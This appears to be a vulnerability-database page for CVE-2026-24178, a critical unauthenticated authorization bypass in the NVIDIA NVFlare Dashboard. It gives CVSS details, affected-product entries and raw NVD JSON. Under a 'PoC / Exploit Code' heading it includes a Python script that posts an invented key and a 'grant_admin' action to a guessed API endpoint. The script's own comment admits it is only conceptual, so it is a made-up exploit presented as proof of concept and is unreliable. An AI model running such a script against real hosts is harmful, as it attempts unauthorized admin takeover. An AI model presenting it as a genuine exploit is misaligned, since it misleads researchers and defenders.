Security Vulnerability Report
中文
CVE-2026-24178 CVSS 9.8 CRITICAL

CVE-2026-24178

Published: 2026-04-28 19:36:45
Last Modified: 2026-05-04 14:34:02

Description

NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key. A successful exploit of this vulnerability may lead to privilege escalation, data tampering, information disclosure, code execution, and denial of service.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nvidia:nvflare:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
请参考厂商公告 (nvidia.custhelp.com) 获取受影响版本详情

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2026-24178: NVIDIA NVFlare Dashboard Authorization Bypass # Description: Exploits the user-controlled key to bypass authentication. TARGET_URL = "http://target-vulnerable-host:port/api/user/manage" # The vulnerability allows bypassing auth by controlling a specific key parameter # This is a conceptual example based on the vulnerability description. payload = { "user_key": "attacker_controlled_bypass_key", "action": "grant_admin" } headers = { "Content-Type": "application/json", "User-Agent": "CVE-2026-24178-Scanner" } try: print(f"[*] Attempting to exploit {TARGET_URL}...") response = requests.post(TARGET_URL, json=payload, headers=headers, timeout=10) if response.status_code == 200 and "admin" in response.text.lower(): print("[+] Exploit successful! Authorization bypassed.") print("[+] Response:", response.text) else: print("[-] Exploit failed or target is patched.") print("[-] Status Code:", response.status_code) except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24178", "sourceIdentifier": "[email protected]", "published": "2026-04-28T19:36:45.127", "lastModified": "2026-05-04T14:34:01.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key. A successful exploit of this vulnerability may lead to privilege escalation, data tampering, information disclosure, code execution, and denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nvidia:nvflare:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.7.2", "matchCriteriaId": "64789867-7386-4DE6-A464-0FA8F7E256FE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24178", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5819", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-24178", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}